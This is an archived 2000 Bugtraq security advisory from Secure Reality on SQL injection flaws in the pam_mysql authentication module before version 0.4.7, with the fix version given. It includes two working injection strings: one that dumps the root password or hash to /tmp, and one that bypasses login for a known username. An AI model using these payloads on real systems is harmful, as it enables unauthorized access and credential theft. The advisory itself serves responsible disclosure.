![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Fri, 27 Oct 2000 00:45:26 +1000
From: Secure Reality Advisories <create@SECUREREALITY.COM.AU>
Subject: (SRADV00004) Remote and local vulnerabilities in pam_mysql
To: BUGTRAQ@SECURITYFOCUS.COM
=================================================
Secure Reality Pty Ltd. Security Advisory #4 (SRADV00004)
http://www.securereality.com.au
=================================================
[Title]
Remote and local vulnerabilities in pam_mysql
[Released]
26/10/2000
[Vulnerable]
All versions of pam_mysql < 0.4.7
[Overview]
pam_mysql is a pluggable authentication module to allow user authentication
against mysql databases. The module constructs SQL statements using user
input (username and password) without escaping it. This leads to trivial
attacks that can result in the exposure of plaintext passwords/hashes to
remote unauthorized login.
[Impact]
- Versions < 0.4 = Possible local exposure of plaintext passwords/hashes
- Versions => 0.4 = Remote unauthorized login
[Detail]
pam_mysql constructs SQL statements using snprintf with %s parameters
containing unescaped user parameters.
Versions < 0.4 used constructed statements like the following:
select password from users where user = '<user>'
The selected password was then checked against the inputted one (once any
required encryption had been applied to the inputted password). Unlike other
SQL servers in MySQL there is no method by which to break into an entirely
new SQL statement so any attack must be based on manipulating the portion of
the string we can control. In this case input like:
root' into file '/tmp/r00tpassword
will result in the root password (cleartext or hash) being copied to the
temporary directory. This is dependant on the MySQL user used by pam_mysql
having permissions to write server files, a relatively reliable proposition
for this sort of security software.
Versions => 0.4 developed an alternative statement like the following
select user from users where user = '<user>' and password = '<pass>'
The module then checks that one row is returned by this query. If we can
guess a username we can gain remote access to the server as any remotely
logable user (dependant on pam_securetty.so and pam_nologin.so) with a
password string like the following (assuming 'bill' is a known valid
username):
' or user = 'bill
[Fix]
Please upgrade to version 0.4.7 at
http://download.sourceforge.net/pam-mysql/pam_mysql-0.4.7.tar.gz
[Acknowledgements]
Our thanks to Steve Brown (Senior System Admin at DearDiary.net and
maintainer of pam_mysql) for his prompt and cooperative assistance in this
matter.
[Disclaimer]
Advice, directions and instructions on security vulnerabilities in this
advisory do not constitute: an endorsement of illegal behavior; a guarantee
that protection measures will work; an endorsement of any product or
solution or recommendations on behalf of Secure Reality Pty Ltd. Content is
provided as is and Secure Reality does not accept responsibilty for any
damage or injury caused as a result of its use.